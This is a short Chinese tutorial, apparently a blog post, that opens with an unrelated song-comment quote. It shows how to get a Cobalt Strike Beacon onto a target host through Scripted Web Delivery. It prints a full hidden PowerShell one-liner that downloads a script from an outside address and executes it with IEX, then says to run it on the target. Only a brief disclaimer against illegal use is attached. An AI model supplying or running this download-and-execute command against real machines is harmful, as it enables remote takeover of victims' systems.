讲过去像是在卖惨,讲未来像是在白日做梦,讲现在又像是旁观者迷,迟迟无语,字字苦酸。。。
---- 网易云热评
一、新建Listeners,点击save
二、利用powershell命令获取目标主机的Beacon
1、选择Attacks--Web Drive-by--Scripted web Delivery
2、选择添加的Listener,点击Launch
3、获取powershell的单行指令
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.133:8888/a'))"
4、在目标主机的powershell中运行
5、目标主机上线
禁止非法,后果自负
